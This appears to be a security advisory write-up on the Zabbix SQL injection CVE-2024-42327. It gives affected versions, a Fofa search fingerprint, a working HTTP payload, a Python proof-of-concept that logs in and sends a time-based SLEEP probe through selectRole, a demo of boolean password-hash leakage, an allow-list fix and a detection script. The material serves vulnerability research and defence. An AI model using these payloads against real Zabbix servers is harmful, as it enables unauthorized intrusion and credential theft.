0x00 Introduction
Zabbix is a monitoring platform that tracks numerous network parameters as well as the health and integrity of servers, virtual machines, applications, services, databases, websites, cloud resources and more. It uses a flexible notification mechanism that lets users configure e-mail based alerts for practically any event, which allows a fast reaction to server problems. Zabbix also provides reporting and data visualization based on the stored data.
Affected versions (CVE-2024-42327):
- 6.0.0 – 6.0.31
- 6.4.0 – 6.4.16
- 7.0.0
Fofa fingerprint: app="ZABBIX-监控系统"
0x01 Vulnerability analysis & reproduction
Any non-admin account on the Zabbix frontend that has the default User role, or any other role that grants API access, can exploit this vulnerability; no administrative privilege is needed, only valid credentials for an API-enabled account. The SQL injection is in the addRelatedObjects function of the CUser class. That function is called from CUser.get, which is reachable by every user with API access, so the bug is exposed through the user.get API method. The injection point is the selectRole parameter: its entries are expected to be column names of the role table, but they reach the query without validation, so an entry such as readonly AND (SELECT(SLEEP(5))) is executed as SQL and the response is delayed by the sleep when the backend is MySQL/MariaDB.
Payload (the auth field must hold a valid session token obtained from user.login; the empty string below is a placeholder, and Content-Length must match the body actually sent):
POST /api_jsonrpc.php HTTP/1.1
Host: localhost
User-Agent: curl/8.11.0
Accept: */*
Content-Type: application/json
Content-Length: 222
Connection: keep-alive

{
    "jsonrpc": "2.0",
    "method": "user.get",
    "params": {
        "selectRole": ["roleid", "name", "type", "readonly AND (SELECT(SLEEP(5)))"],
        "userids": ["1","2"]
    },
    "id": 1,
    "auth": ""
}
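The following Python model is an added illustration, not code from the original post or from Zabbix. It uses an in-memory SQLite database with a constructed two-table schema that only loosely stands in for Zabbix's role and users tables (Zabbix's real query construction and its fix differ in detail) to show what happens when a caller-controlled output field list such as selectRole is joined into a SELECT column list unvalidated, and how an allow-list check stops it. SQLite has no SLEEP(), so the probe here is boolean rather than time based, which also makes the point that this class of injection leaks data, not just time: the fourth returned column becomes whatever the attacker's subquery evaluates to.

```python
import sqlite3

# Added example, not Zabbix code: a simplified model of the bug class behind CVE-2024-42327.
# The schema is constructed for this demo and only loosely follows Zabbix's role/users tables;
# Zabbix's real query construction and fix differ in detail.
SCHEMA = """
CREATE TABLE role  (roleid INTEGER PRIMARY KEY, name TEXT, type INTEGER, readonly INTEGER);
CREATE TABLE users (userid INTEGER PRIMARY KEY, username TEXT, passwd TEXT, roleid INTEGER);
INSERT INTO role  VALUES (1, 'User role', 1, 0), (3, 'Super admin role', 3, 1);
INSERT INTO users VALUES (1, 'Admin', '$2y$10$constructed-hash-for-demo', 3),
                         (2, 'guest', '', 1);
"""

# Allow-list of real columns of the role table: what a selectRole entry must be checked against.
ROLE_COLUMNS = frozenset({"roleid", "name", "type", "readonly"})

# SQLite has no SLEEP(), so instead of the page's time-based probe this one is boolean:
# the injected fourth "column" evaluates to 1 only if the Admin password hash starts with '$2y$'.
LEAK_PROBE = "readonly AND (SELECT substr(passwd, 1, 4) = '$2y$' FROM users WHERE userid = 1)"


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def build_query_unsafe(output):
    """The bug class: the caller-supplied output list is joined verbatim into the column list."""
    return "SELECT " + ", ".join(output) + " FROM role WHERE roleid = ?"


def build_query_safe(output):
    """Hardened form: every requested field must be a known column name, nothing else."""
    bad = [field for field in output if field not in ROLE_COLUMNS]
    if bad:
        raise ValueError(f"invalid output field(s) for role: {bad}")
    return "SELECT " + ", ".join(output) + " FROM role WHERE roleid = ?"


def select_role(conn, output, roleid, safe):
    """Fetch one role row with the requested fields, using the unsafe or the hardened builder."""
    builder = build_query_safe if safe else build_query_unsafe
    return conn.execute(builder(output), (roleid,)).fetchone()


if __name__ == "__main__":
    conn = open_db()
    fields = ["roleid", "name", "type", "readonly"]
    print(select_role(conn, fields, 3, safe=False))                      # (3, 'Super admin role', 3, 1)
    # Same request with the last field replaced by an expression, as the page's payload does.
    print(select_role(conn, fields[:3] + [LEAK_PROBE], 3, safe=False))   # last value is 1: guess was right
    wrong_guess = LEAK_PROBE.replace("'$2y$'", "'$2x$'")
    print(select_role(conn, fields[:3] + [wrong_guess], 3, safe=False))  # last value is 0: guess was wrong
    try:
        select_role(conn, fields[:3] + [LEAK_PROBE], 3, safe=True)
    except ValueError as err:
        print("hardened builder rejected the request:", err)
```

The allow-list check is the whole fix for this bug class: the output list is metadata (column names), never data, so it must never be interpolated from untrusted input without being matched against the table's known columns.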
PoC usage: the script takes -t <Zabbix frontend base URL> (the script appends /api_jsonrpc.php itself), -u <username> and -p <password> of any account with API access, logs in with user.login and then sends the timing payload (see its argparse definition below).
0x02 Vulnerability PoC
https://github.com/compr00t/CVE-2024-42327
import requests
import argparse
import time

"""
Optimized Proof of Concept for CVE-2024-42327
Author: Patrick Schmid (compr00t.bsky.social)
References:
- Zabbix Issue Tracker: https://support.zabbix.com/browse/ZBX-25623
Disclaimer: This script is provided for educational purposes only!
"""

HEADERS = {"Content-Type": "application/json"}


def get_auth_token(target, username, password):
    """Obtain a valid session token from the target."""
    url = f"{target.rstrip('/')}/api_jsonrpc.php"
    login_data = {
        "jsonrpc": "2.0",
        "method": "user.login",
        "params": {"username": username, "password": password},
        "id": 1,
        "auth": None
    }
    try:
        response = requests.post(url, json=login_data, headers=HEADERS)
        response.raise_for_status()
        # user.login returns the session token as "result" on success
        result = response.json().get("result")
        if result:
            print(f"[+] Session token: {result}")
            return result
        else:
            print("[-] Failed to retrieve session token. Check credentials.")
            return None
    except requests.exceptions.RequestException as e:
        print(f"[-] Login request failed: {e}")
    except ValueError:
        print("[-] Failed to decode JSON response during login.")
    return None


def test_sqli(target, auth_token):
    """Test the target for SQL injection vulnerability (time-based: MySQL/MariaDB SLEEP)."""
    url = f"{target.rstrip('/')}/api_jsonrpc.php"
    user_data = {
        "jsonrpc": "2.0",
        "method": "user.get",
        "params": {
            # The last selectRole entry is the injected expression; the others are real columns.
            "selectRole": ["roleid", "name", "type", "readonly AND (SELECT(SLEEP(5)))"],
            "userids": ["1", "2"]
        },
        "id": 1,
        "auth": auth_token
    }
    try:
        start_time = time.perf_counter()
        response = requests.post(url, json=user_data, headers=HEADERS)
        response.raise_for_status()
        elapsed_time = time.perf_counter() - start_time
        if elapsed_time < 5:
            print("[+] Response time < 5 seconds. Target is NOT vulnerable.")
        else:
            print(f"[!] Response time: {elapsed_time:.2f} seconds. Target is VULNERABLE!")
    except requests.exceptions.RequestException as e:
        print(f"[-] SQLi test request failed: {e}")
    except ValueError:
        print("[-] Failed to decode JSON response during SQLi test.")


def main():
    parser = argparse.ArgumentParser(description="PoC for CVE-2024-42327")
    # -t is the frontend base URL; /api_jsonrpc.php is appended by the script.
    parser.add_argument("-t", "--target", required=True, help="The Zabbix frontend base URL.")
    parser.add_argument("-u", "--username", required=True, help="The username for authentication.")
    parser.add_argument("-p", "--password", required=True, help="The password for authentication.")
    args = parser.parse_args()

    auth_token = get_auth_token(args.target, args.username, args.password)
    if auth_token:
        test_sqli(args.target, auth_token)


if __name__ == "__main__":
    main()

Caveats when reading the result: the probe relies on the MySQL/MariaDB SLEEP() function, so on a PostgreSQL-backed Zabbix the injected query fails instead of delaying and the script prints "NOT vulnerable" even though the injection point is the same; a slow or loaded target can also push a benign request past 5 seconds. The script confirms the injection point only; it needs working credentials for any API-enabled account to begin with.
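Because the PoC's request is indistinguishable from normal API traffic at the HTTP level (same endpoint, same method, valid session), detection has to look at the JSON-RPC body. The following detection script is an added example, not part of the post, the PoC repository, or Zabbix. It assumes request bodies for api_jsonrpc.php are available (from a reverse proxy that logs bodies, a WAF, or a packet capture; the sample bodies below are constructed) and flags every output or select* entry that is not a bare identifier: the Zabbix API accepts only "extend", "count" or column names there, so spaces, parentheses or operators in such an entry are an injection attempt whatever method they target, not only user.get/selectRole.

```python
import json
import re

# Added detection example; not part of the original post, the PoC, or Zabbix.
# Input: JSON-RPC request bodies for api_jsonrpc.php, e.g. from a reverse proxy that logs
# bodies, a WAF, or a packet capture. The bodies below are constructed for this example.

# Zabbix "output" / "select*" parameters accept only "extend", "count" or column names,
# so a legitimate entry is always a bare identifier.
IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")
# Markers of the time-based probe style used in the page's payload (MySQL, PostgreSQL, MSSQL).
TIME_BASED = re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP|WAITFOR)\b", re.IGNORECASE)


def suspicious_fields(body):
    """Return one finding per output/select* entry that is not a plain column name."""
    try:
        req = json.loads(body)
    except json.JSONDecodeError:
        return []
    params = req.get("params") if isinstance(req, dict) else None
    if not isinstance(params, dict):          # e.g. apiinfo.version uses "params": []
        return []
    findings = []
    for key, value in params.items():
        if key != "output" and not key.startswith("select"):
            continue
        entries = value if isinstance(value, list) else [value]
        for entry in entries:
            if isinstance(entry, str) and IDENT.fullmatch(entry):
                continue                       # "extend", "roleid", "name", ... are fine
            findings.append({
                "method": req.get("method"),
                "param": key,
                "value": entry,
                "time_based": isinstance(entry, str) and bool(TIME_BASED.search(entry)),
            })
    return findings


def scan(bodies):
    """bodies: iterable of (source label, raw JSON body). Returns all findings with their source."""
    results = []
    for source, body in bodies:
        for finding in suspicious_fields(body):
            finding["source"] = source
            results.append(finding)
    return results


# Constructed sample traffic: two benign calls, one version probe, and the page's payload.
SAMPLE_BODIES = [
    ("10.0.0.5 #1", json.dumps({"jsonrpc": "2.0", "method": "user.get",
                                "params": {"selectRole": ["roleid", "name"], "userids": ["1"]},
                                "id": 1, "auth": "token"})),
    ("10.0.0.5 #2", json.dumps({"jsonrpc": "2.0", "method": "host.get",
                                "params": {"output": "extend", "selectInterfaces": "extend"},
                                "id": 2, "auth": "token"})),
    ("10.0.0.9 #1", json.dumps({"jsonrpc": "2.0", "method": "apiinfo.version",
                                "params": [], "id": 1})),
    ("10.0.0.9 #2", json.dumps({"jsonrpc": "2.0", "method": "user.get",
                                "params": {"selectRole": ["roleid", "name", "type",
                                                          "readonly AND (SELECT(SLEEP(5)))"],
                                           "userids": ["1", "2"]},
                                "id": 1, "auth": "token"})),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_BODIES):
        print(finding)
```

In practice, pair the body check with response timing from the same proxy log: a flagged request whose response took about as long as the SLEEP() argument is a confirmed successful probe rather than a blocked attempt, and the account behind the session token is the one to disable.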
Originally published on the WeChat public account 星悦安全: Zabbix has a SQL injection vulnerability (CVE-2024-42327)
Disclaimer: the programs (methods) covered in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site bears no legal or joint liability. Questions can be sent by e-mail (use a corporate or otherwise valid mailbox so the message is not filtered; contact details are on the home page).